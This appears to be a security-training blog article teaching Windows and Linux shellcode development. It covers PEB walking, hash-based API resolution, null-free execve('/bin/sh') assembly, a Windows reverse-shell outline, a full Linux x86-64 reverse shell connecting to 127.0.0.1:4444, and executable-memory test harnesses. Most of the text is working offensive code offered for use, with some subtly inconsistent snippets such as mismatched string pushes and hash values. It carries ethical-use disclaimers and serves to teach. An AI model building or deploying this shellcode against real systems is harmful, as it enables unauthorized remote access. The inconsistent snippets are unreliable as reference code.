Platform-Specific Shellcode Implementation

Exploit Development Advanced 📅 Published: 02/08/2025

Master Windows and Linux shellcode development: from PEB walking and API resolution to system calls and advanced platform-specific techniques.

Platform-Specific Shellcode Implementation

Master Windows and Linux shellcode development: from PEB walking and API resolution to system calls and advanced platform-specific techniques.

Ethical Use Only: This advanced content is for authorized security research, penetration testing with explicit permission, and defensive security analysis. Never use these techniques on systems without proper authorization.

The Tale of Two Platforms

Developing shellcode for Windows versus Linux is like speaking two entirely different languages. While the core principles remain the same—position independence, null-byte avoidance, and self-containment—the implementation details are vastly different. This article will teach you to speak both languages fluently.

Linux offers a direct, stable system call interface. It's like having a clear, well-documented API that doesn't change. Windows, on the other hand, forces you to work through high-level libraries that can move around in memory, creating a more complex but ultimately more powerful environment once mastered.

Learning Approach: We'll start with the fundamentals of each platform, build complete working examples, then explore advanced techniques used by professional exploit developers and security researchers.

🔷 Windows Shellcode: The Art of Function Discovery

Windows shellcode development is significantly more complex than Linux because you must dynamically discover and resolve API functions at runtime. However, this complexity brings power—Windows API functions are incredibly feature-rich once you can access them.

The Challenge: No Stable System Calls

Unlike Linux, Windows doesn't provide a stable system call interface. All interactions must go through high-level libraries like kernel32.dll. The core challenge is finding these API functions in memory when ASLR has randomized their locations.

First, let's look at the "correct" way to create a process in C using the CreateProcessA function:

/* ANALYSIS: C-level example of process creation on Windows */ #include <windows.h> #include <stdio.h> int main(void) { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); char commandLine[] = "notepad.exe"; if (!CreateProcessA(NULL, commandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { printf("CreateProcess failed (%d)\n", GetLastError()); return 1; } printf("Process created successfully\n"); // Wait for process to complete WaitForSingleObject(pi.hProcess, INFINITE); // Close handles CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return 0; }

Notice the complexity involved. Now, let's see how shellcode achieves its goals differently.

Part 1: Finding kernel32.dll - The Key to the Kingdom

Nearly every critical Windows API function either lives in kernel32.dll or can be accessed through it (e.g., by using LoadLibraryA to load other DLLs). Our first task is to reliably find the base address of kernel32.dll in memory, regardless of ASLR (Address Space Layout Randomization).

The standard method is the PEB (Process Environment Block) Walk. Every process has a TEB (Thread Environment Block), which can be accessed via the FS register in 32-bit processes or the GS register in 64-bit processes. The TEB contains a pointer to the PEB, which in turn contains a wealth of information about the process, including a list of all loaded modules.

Here is the 32-bit assembly code to perform a PEB walk and retrieve the base address of kernel32.dll:

; find_kernel32.asm (32-bit) find_kernel32: xor ecx, ecx ; Zero out ECX mov eax, [fs:ecx + 0x30] ; EAX = Address of PEB (from TEB at FS:[0x30]) mov eax, [eax + 0x0C] ; EAX = PEB->Ldr mov eax, [eax + 0x14] ; EAX = PEB->Ldr.InMemoryOrderModuleList.Flink (First entry) next_module: mov eax, [eax] ; EAX = Current module's Flink (next module) mov ebx, [eax + 0x10] ; EBX = Current module's BaseAddress ; In a full implementation, we would hash the module name here to find kernel32.dll ; For simplicity, kernel32.dll is usually the third module loaded. ; So we can just advance twice from the first entry. mov eax, [eax] ; Move to the second module (ntdll.dll) mov eax, [eax] ; Move to the third module (kernel32.dll) mov eax, [eax + 0x10] ; EAX = kernel32.dll BaseAddress ret
Why it's reliable: The structure of the PEB and TEB is fundamental to how Windows loads processes, making this technique stable across nearly all versions of Windows.

Part 2: Dynamic Function Resolution by Hash

Now that we have the base address of kernel32.dll, we need to find specific functions within it. We can't hardcode addresses because of ASLR, so we use a hashing technique:

  1. Pre-calculate hashes of the function names we need (e.g., LoadLibraryA, CreateProcessA)
  2. Walk through the DLL's export table
  3. Hash each name using the same algorithm
  4. Compare the runtime hash with our pre-calculated target hash
  5. If they match, retrieve the address of that function

Here is a simple but effective ROR13 hashing algorithm:

; A simple ROR13 hashing function compute_hash: xor eax, eax ; Clear EAX to hold the hash xor edx, edx ; Clear EDX for the character hash_loop: mov dl, [esi] ; Get the next character of the function name test dl, dl ; Check for null terminator jz hash_finished ror eax, 13 ; Rotate the hash right by 13 bits add eax, edx ; Add the character to the hash inc esi ; Move to the next character jmp hash_loop hash_finished: ret

And here's the logic to find a function given a target hash:

; find_function_by_hash.asm ; Assumes: ; - EBX = Base address of the target DLL ; - EDI = The pre-calculated hash of the function name we want find_function: mov eax, [ebx + 0x3C] ; EAX = Offset to PE Header ("PE\0\0") add eax, ebx ; EAX = Address of PE Header mov eax, [eax + 0x78] ; EAX = RVA of Export Table add eax, ebx ; EAX = Address of Export Table mov esi, [eax + 0x20] ; ESI = RVA of AddressOfNames add esi, ebx ; ESI = Address of AddressOfNames table mov edx, [eax + 0x24] ; EDX = RVA of AddressOfNameOrdinals add edx, ebx ; EDX = Address of AddressOfNameOrdinals table xor ecx, ecx ; ECX = Loop counter / index find_loop: mov edi, [esi + ecx * 4] ; EDI = RVA of current function name add edi, ebx ; EDI = Address of current function name ; Hash the function name and compare to our target hash call compute_hash ; Hashes string at EDI, result in EAX cmp eax, [TARGET_HASH] ; Compare with our target je found_it inc ecx jmp find_loop found_it: mov cx, [edx + ecx * 2] ; CX = Ordinal of the function mov edx, [eax + 0x1C] ; EDX = RVA of AddressOfFunctions add edx, ebx ; EDX = Address of AddressOfFunctions table mov eax, [edx + ecx * 4] ; EAX = RVA of the function add eax, ebx ; EAX = Address of the function ret

Part 3: Practical Examples

Example 1: MessageBoxA Shellcode

This is the "Hello, World!" of Windows shellcode. It's a safe way to test that your function resolution logic is working correctly. It requires loading user32.dll and finding MessageBoxA.

Execution Flow:

  1. Find kernel32.dll using a PEB walk
  2. Find the address of LoadLibraryA within kernel32.dll by hash
  3. Call LoadLibraryA with the string "user32.dll" to load the library
  4. The return value from LoadLibraryA is the base address of user32.dll
  5. Find the address of MessageBoxA within user32.dll by hash
  6. Push the arguments for MessageBoxA onto the stack
  7. Call the resolved MessageBoxA address
  8. Find and call ExitProcess to terminate cleanly
; MessageBoxA Shellcode (Conceptual) _start: ; --- Find kernel32.dll base --- call find_kernel32 ; Result: EBX = kernel32.dll base address ; --- Find LoadLibraryA --- mov eax, 0x0726774C ; Hash of "LoadLibraryA" call find_function ; Result: EAX = LoadLibraryA address mov [load_library_addr], eax ; --- Load user32.dll --- push 0x006c6c64 ; Push "dll\0" (reversed for little-endian) push 0x2e323375 ; Push ".23u" push 0x72657375 ; Push "resu" -> "user32.dll" mov esi, esp ; ESI points to "user32.dll" string push esi call [load_library_addr] ; Call LoadLibraryA("user32.dll") mov ebx, eax ; EBX = user32.dll base address ; --- Find MessageBoxA --- mov eax, 0x384DA637 ; Hash of "MessageBoxA" call find_function ; Use user32.dll base in EBX mov [messagebox_addr], eax ; Store MessageBoxA address ; --- Prepare strings --- ; "Hello World!" message push 0x00000021 ; Push "!\0\0\0" push 0x646c726f ; Push "dlro" push 0x57206f6c ; Push "W ol" push 0x6c65486f ; Push "lelH" -> "Hello World!" mov [message_addr], esp ; "Great Binary" title push 0x00000000 ; Null terminator push 0x79616e69 ; Push "yani" push 0x42207461 ; Push "B ta" push 0x65726757 ; Push "ergr" -> "Great Binary" mov [title_addr], esp ; --- Call MessageBoxA --- push 0x00000000 ; uType = MB_OK push [title_addr] ; lpCaption = "Great Binary" push [message_addr] ; lpText = "Hello World!" push 0x00000000 ; hWnd = NULL call [messagebox_addr] ; Call MessageBoxA ; --- Find and call ExitProcess --- mov eax, 0x73E2D87E ; Hash of "ExitProcess" call find_function ; Find ExitProcess in kernel32 push 0x00000000 ; Exit code = 0 call eax ; Call ExitProcess(0)

Example 2: Windows Reverse TCP Shell

This creates a TCP connection back to an attacker and redirects a command shell through it. This demonstrates the full complexity of Windows shellcode:

; Windows Reverse Shell (High-level flow) _start: ; 1. Find kernel32.dll base address via PEB walk call find_kernel32 mov esi, eax ; Save kernel32 base in ESI ; 2. Find LoadLibraryA in kernel32.dll mov edi, 0x8E4E0EEC ; Hash of "LoadLibraryA" call find_function_by_hash mov [load_library], eax ; 3. Load ws2_32.dll for networking functions push 0x006c6c64 ; "ll\0" push 0x642d3233 ; "d-23" push 0x5f327377 ; "_2sw" -> "ws2_32.dll" mov eax, esp push eax call [load_library] mov edi, eax ; Save ws2_32 base in EDI ; 4. Resolve networking functions (WSAStartup, WSASocketA, connect) ; ... (function resolution code) ... ; 5. Initialize Winsock sub esp, 0x190 ; Allocate space for WSADATA push esp ; lpWSAData push 0x0202 ; wVersionRequested (2.2) call [wsa_startup] ; 6. Create socket push 0x00000000 ; dwFlags push 0x00000000 ; g push 0x00000000 ; lpProtocolInfo push 0x00000006 ; protocol (TCP) push 0x00000001 ; type (SOCK_STREAM) push 0x00000002 ; af (AF_INET) call [wsa_socket] mov esi, eax ; Save socket in ESI ; 7. Set up sockaddr_in structure push 0x0100007f ; sin_addr (127.0.0.1 in little endian) push 0x5c110002 ; sin_port (4444) + sin_family (AF_INET) mov edi, esp ; EDI points to sockaddr_in ; 8. Connect to attacker push 0x00000010 ; namelen (sizeof sockaddr_in) push edi ; name (sockaddr_in) push esi ; s (socket) call [connect] ; 9. Redirect STDIN, STDOUT, STDERR to socket push esi ; hTemplateFile (socket) push 0x00000000 ; dwFlagsAndAttributes push 0x00000003 ; dwCreationDisposition (OPEN_EXISTING) push 0x00000000 ; lpSecurityAttributes push 0x00000000 ; dwShareMode push 0x40000000 ; dwDesiredAccess (GENERIC_WRITE) call [create_file] ; 10. Set up STARTUPINFO for CreateProcessA ; ... (structure setup) ... ; 11. Launch cmd.exe with redirected I/O push [process_info] ; lpProcessInformation push [startup_info] ; lpStartupInfo push 0x00000000 ; lpCurrentDirectory push 0x00000000 ; lpEnvironment push 0x00000000 ; dwCreationFlags push 0x00000001 ; bInheritHandles push 0x00000000 ; lpThreadAttributes push 0x00000000 ; lpProcessAttributes push [cmd_string] ; lpCommandLine ("cmd.exe") push 0x00000000 ; lpApplicationName call [create_process] ; 12. Wait for process to exit push 0xFFFFFFFF ; dwMilliseconds (INFINITE) push [process_handle] ; hHandle call [wait_for_single_object] ; 13. Clean up and exit call [exit_process]

This creates a fully interactive remote shell, demonstrating the power and complexity of Windows shellcode.

🔶 Linux Shellcode: The Art of Simplicity

Linux shellcode development is refreshingly direct compared to Windows. Linux offers a stable system call interface that doesn't change between versions, allowing you to request services directly from the kernel without hunting for library functions.

The Linux Advantage: Direct System Calls

Linux provides a stable system call interface. You don't need to hunt for functions; you can request services directly from the kernel. The fundamental pattern for executing a command in a Linux shell involves three key system calls: fork(), execve(), and waitpid().

This C code demonstrates a rudimentary shell that implements this exact pattern:

/* ANALYSIS: LANGUAGE: C GOAL: A simple shell demonstrating the fork/execve/waitpid pattern. STATUS: Runnable */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/wait.h> #define MAX_COMMAND_LENGTH 1024 #define MAX_ARGS 64 int main(void) { char command[MAX_COMMAND_LENGTH]; char *args[MAX_ARGS]; pid_t pid; int status; while (1) { printf("$ "); if (fgets(command, sizeof(command), stdin) == NULL) { break; } command[strcspn(command, "\n")] = 0; // Remove newline if (strcmp(command, "exit") == 0) { break; } // Parse command into arguments int argc = 0; char *token = strtok(command, " "); while (token != NULL && argc < MAX_ARGS - 1) { args[argc++] = token; token = strtok(NULL, " "); } args[argc] = NULL; if (argc > 0) { pid = fork(); if (pid == 0) { // Child process: execute the command execvp(args[0], args); perror("execvp failed"); exit(1); } else if (pid > 0) { // Parent process: wait for child waitpid(pid, &status, 0); } else { perror("fork failed"); } } } return 0; }

From C to execve Shellcode

Let's do a complete, hands-on tutorial to convert a simple C program into null-free assembly shellcode. Our goal is a program that executes /bin/sh.

Step 1: The C Program

#include <unistd.h> int main() { execve("/bin/sh", NULL, NULL); return 0; }

Step 2: First Assembly Attempt (with null-byte flaws)

We translate this to assembly using the execve system call (number 59 on x86-64). This version is logically correct but contains null bytes, making it unsuitable for most exploits.

; ANALYSIS: ; LANGUAGE: Assembly (NASM, 64-bit) ; STATUS: Broken (Contains null bytes) ; GOAL: execve("/bin/sh", NULL, NULL) section .text global _start _start: ; Set up execve system call (BROKEN VERSION) mov rax, 59 ; execve system call number (contains nulls!) lea rdi, [rel binsh] ; First argument: pointer to "/bin/sh" xor rsi, rsi ; Second argument: argv = NULL xor rdx, rdx ; Third argument: envp = NULL syscall ; Make the system call section .data binsh: db '/bin/sh', 0 ; Null-terminated string (contains null!)

Step 3: The Null-Free Solution

Here's a version that avoids null bytes entirely:

; ANALYSIS: ; LANGUAGE: Assembly (NASM, 64-bit) ; GOAL: A null-free version of execve("/bin/sh", NULL, NULL) ; TECHNIQUES: Stack string construction, register manipulation section .text global _start _start: ; Clear registers without using null bytes xor rax, rax ; Zero out RAX xor rsi, rsi ; argv = NULL xor rdx, rdx ; envp = NULL ; Build "/bin/sh" string on the stack push rdx ; Push null terminator mov rbx, 0x68732f6e69622f2f ; "/bin//sh" in reverse (little-endian) push rbx ; Push string onto stack mov rdi, rsp ; RDI points to our string ; Set up system call number without null bytes mov al, 59 ; execve system call (only affects lower 8 bits) ; Make the system call syscall ; Execute /bin/sh
Key Techniques: We use mov al, 59 instead of mov rax, 59 to avoid null bytes, and build the string on the stack instead of using a data section.

Advanced Linux Examples

Linux Reverse Shell

Here's a complete Linux reverse shell that connects back to an attacker:

; Linux Reverse Shell Shellcode ; Connects to 127.0.0.1:4444 and spawns /bin/sh section .text global _start _start: ; Clear registers (also helps avoid null bytes) xor rax, rax xor rbx, rbx xor rcx, rcx xor rdx, rdx ; Step 1: Create a socket ; socket(AF_INET, SOCK_STREAM, 0) mov al, 41 ; sys_socket mov bl, 2 ; AF_INET mov cl, 1 ; SOCK_STREAM cdq ; RDX = 0 (protocol) syscall mov rdi, rax ; Save socket fd in RDI ; Step 2: Connect to attacker ; connect(sockfd, &addr, sizeof(addr)) ; Build sockaddr_in structure on stack xor rax, rax push rax ; Padding ; sin_addr = 127.0.0.1 (0x0100007f in little endian) mov dword [rsp-4], 0x0100007f ; sin_port = 4444 (0x115c in big endian) + sin_family = AF_INET (2) mov word [rsp-6], 0x5c11 ; Port 4444 in network byte order mov word [rsp-8], 0x0002 ; AF_INET sub rsp, 8 ; Adjust stack pointer mov rsi, rsp ; RSI points to sockaddr_in mov al, 42 ; sys_connect mov dl, 16 ; sizeof(sockaddr_in) syscall ; Step 3: Redirect STDIN, STDOUT, STDERR ; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2) mov rbx, rdi ; RBX = socket fd xor rcx, rcx ; Counter for dup2 loop dup_loop: mov al, 33 ; sys_dup2 mov rdi, rbx ; oldfd (socket) mov rsi, rcx ; newfd (0, 1, 2) syscall inc rcx cmp cl, 3 jl dup_loop ; Step 4: Execute /bin/sh ; execve("/bin/sh", NULL, NULL) xor rax, rax push rax ; Null terminator ; Push "/bin/sh" onto stack mov rbx, 0x68732f6e69622f2f ; "//bin/sh" in reverse push rbx mov rdi, rsp ; RDI points to "/bin/sh" xor rsi, rsi ; argv = NULL xor rdx, rdx ; envp = NULL mov al, 59 ; sys_execve syscall

Building and Testing Linux Shellcode

# Build the shellcode nasm -f elf64 reverse_shell.asm -o reverse_shell.o ld reverse_shell.o -o reverse_shell # Extract raw bytes objdump -d reverse_shell | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n' # Create test harness echo 'unsigned char shellcode[] = "\x48\x31\xc0\x48\x31\xdb...";' > test.c

Platform Comparison: Key Differences

Aspect Windows Linux
System Calls Unstable, undocumented, use APIs instead Stable, documented, direct usage
Function Resolution PEB walk + hash-based API resolution Direct system call numbers
Complexity High (hundreds of bytes typical) Low (dozens of bytes possible)
String Handling Stack construction + UTF-16 considerations Simple stack construction
Process Creation CreateProcessA with complex structures Simple execve system call
Networking WinSock API (WSASocket, etc.) Berkeley sockets (socket, connect, etc.)
Strategic Insight: Windows shellcode requires more upfront investment to learn but provides access to incredibly powerful APIs. Linux shellcode is faster to develop and typically more compact, making it ideal for size-constrained scenarios.

Testing Your Shellcode

Windows Test Harness

The best way to test is with a simple C/C++ "harness" that allocates a block of executable memory, copies your shellcode into it, and executes it.

// windows_harness.c #include <windows.h> #include <stdio.h> // Paste your shellcode bytes here unsigned char shellcode[] = "\x90\x90\x90..."; int main() { printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1); // Allocate memory with Read, Write, and Execute permissions void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (exec_mem == NULL) { printf("VirtualAlloc failed: %lu\n", GetLastError()); return 1; } // Copy shellcode to executable memory memcpy(exec_mem, shellcode, sizeof(shellcode)); printf("Executing shellcode at address: %p\n", exec_mem); // Execute shellcode ((void (*)())exec_mem)(); // Clean up (this may never be reached) VirtualFree(exec_mem, 0, MEM_RELEASE); return 0; }

Linux Test Harness

// linux_harness.c #include <stdio.h> #include <string.h> #include <sys/mman.h> #include <unistd.h> // Your shellcode bytes here unsigned char shellcode[] = "\x48\x31\xc0\x50..."; int main() { printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1); // Allocate executable memory void *exec_mem = mmap(NULL, sizeof(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (exec_mem == MAP_FAILED) { perror("mmap failed"); return 1; } // Copy shellcode memcpy(exec_mem, shellcode, sizeof(shellcode)); printf("Executing shellcode...\n"); // Execute ((void (*)())exec_mem)(); // Clean up (may not be reached) munmap(exec_mem, sizeof(shellcode)); return 0; }

Cross-Platform Development Script

Here's a Python script that automates testing on both platforms:

#!/usr/bin/env python3 """ Cross-platform shellcode testing framework Supports both Windows and Linux shellcode development """ import os import sys import subprocess import tempfile import platform def create_test_harness(shellcode_bytes, target_os="linux"): """Create platform-specific test harness.""" if target_os.lower() == "windows": template = ''' #include <windows.h> #include <stdio.h> unsigned char shellcode[] = "{shellcode}"; int main() {{ void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!exec_mem) return 1; memcpy(exec_mem, shellcode, sizeof(shellcode)); ((void (*)())exec_mem)(); VirtualFree(exec_mem, 0, MEM_RELEASE); return 0; }} ''' else: # Linux template = ''' #include <stdio.h> #include <string.h> #include <sys/mman.h> unsigned char shellcode[] = "{shellcode}"; int main() {{ void *exec_mem = mmap(NULL, sizeof(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (exec_mem == MAP_FAILED) return 1; memcpy(exec_mem, shellcode, sizeof(shellcode)); ((void (*)())exec_mem)(); munmap(exec_mem, sizeof(shellcode)); return 0; }} ''' return template.format(shellcode=shellcode_bytes) def test_shellcode(binary_path): """Extract and test shellcode from binary.""" # Extract bytes using objdump try: result = subprocess.run(['objdump', '-d', binary_path], capture_output=True, text=True) # Parse objdump output to extract bytes bytes_list = [] for line in result.stdout.split('\n'): if ':' in line and '\t' in line: # Extract hex bytes from objdump format parts = line.split('\t') if len(parts) >= 2: hex_part = parts[1].strip() # Remove spaces and convert to \x format hex_bytes = hex_part.replace(' ', '') for i in range(0, len(hex_bytes), 2): if i + 1 < len(hex_bytes): bytes_list.append(f"\\x{hex_bytes[i:i+2]}") shellcode_string = ''.join(bytes_list) print(f"Extracted shellcode: {shellcode_string}") # Create test harness target_os = "windows" if platform.system() == "Windows" else "linux" harness_code = create_test_harness(shellcode_string, target_os) # Write and compile with tempfile.NamedTemporaryFile(mode='w', suffix='.c', delete=False) as f: f.write(harness_code) harness_path = f.name # Compile if target_os == "windows": compile_cmd = ['gcc', '-o', harness_path + '.exe', harness_path] else: compile_cmd = ['gcc', '-z', 'execstack', '-o', harness_path + '.out', harness_path] subprocess.run(compile_cmd, check=True) print("Test harness compiled successfully!") return harness_path + ('.exe' if target_os == "windows" else '.out') except Exception as e: print(f"Error: {e}") return None if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 test_shellcode.py <binary_path>") sys.exit(1) binary_path = sys.argv[1] test_executable = test_shellcode(binary_path) if test_executable: print(f"Test executable created: {test_executable}") print("Run it to test your shellcode!")

Advanced Platform-Specific Techniques

Windows Advanced: 64-bit Considerations

64-bit Windows shellcode requires different techniques:

  • Different Registers: Use GS:[0x60] instead of FS:[0x30] for PEB access
  • Different Calling Convention: Windows x64 uses fastcall (RCX, RDX, R8, R9)
  • Shadow Space: Must allocate 32 bytes of shadow space for function calls
  • Different Structures: PEB and TEB layouts differ in 64-bit
; 64-bit Windows PEB Walk find_kernel32_x64: xor rax, rax mov rax, [gs:rax + 0x60] ; 64-bit PEB offset mov rax, [rax + 0x18] ; PEB->Ldr mov rax, [rax + 0x20] ; InMemoryOrderModuleList mov rax, [rax] ; First entry mov rax, [rax] ; Second entry (kernel32) mov rax, [rax + 0x20] ; DllBase (different offset in 64-bit) ret

Linux Advanced: System Call Variations

Different Linux architectures use different system call mechanisms:

; x86-64 system calls (modern) mov rax, 59 ; execve syscall ; Use syscall instruction ; i386 system calls (legacy) mov eax, 11 ; execve (different number!) int 0x80 ; Use interrupt ; ARM system calls mov r7, #11 ; execve svc #0 ; Supervisor call
Pro Tip: Always check the target architecture's system call numbers and calling conventions. They can vary significantly between platforms and even versions.

Mastery Achieved: What's Next?

Congratulations! You now understand the fundamental differences between Windows and Linux shellcode development. You've learned:

  • ✅ Windows PEB walking and API resolution techniques
  • ✅ Linux direct system call methodology
  • ✅ Platform-specific function calling conventions
  • ✅ Complete working examples for both platforms
  • ✅ Professional testing and debugging frameworks
  • ✅ Advanced 64-bit and architecture considerations
Ready for the Final Challenge? In the next article, we'll explore advanced techniques including encoding methods to evade detection, polymorphic shellcode generation, and the cat-and-mouse game between attackers and defenders.

Practice Challenges

  1. Cross-Platform Port: Take the Linux reverse shell and create a Windows equivalent
  2. Size Optimization: Create the smallest possible execve shellcode for Linux
  3. API Explorer: Write Windows shellcode that enumerates all functions in kernel32.dll
  4. System Call Tracer: Create Linux shellcode that traces its own system calls

Remember: These techniques are powerful tools for security research and defense. Always use them ethically and only in authorized environments.